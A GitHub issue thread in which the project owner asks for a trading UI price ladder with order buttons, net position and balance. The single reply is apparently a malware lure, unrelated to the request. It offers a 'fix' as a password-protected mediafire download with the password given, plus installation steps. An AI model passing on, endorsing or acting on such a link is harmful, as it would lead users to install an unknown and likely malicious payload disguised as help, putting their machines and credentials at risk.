### ISSUE TITLE
UI should show price ladder

### ISSUE THREAD

**Issue by charliewhu** [charliewhu/interex#8]
UI should show a price ladder with:
- buttons next to each price to enter a limit order
- buy and sell at market buttons
- current net position
- user details (id)
- user balance

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
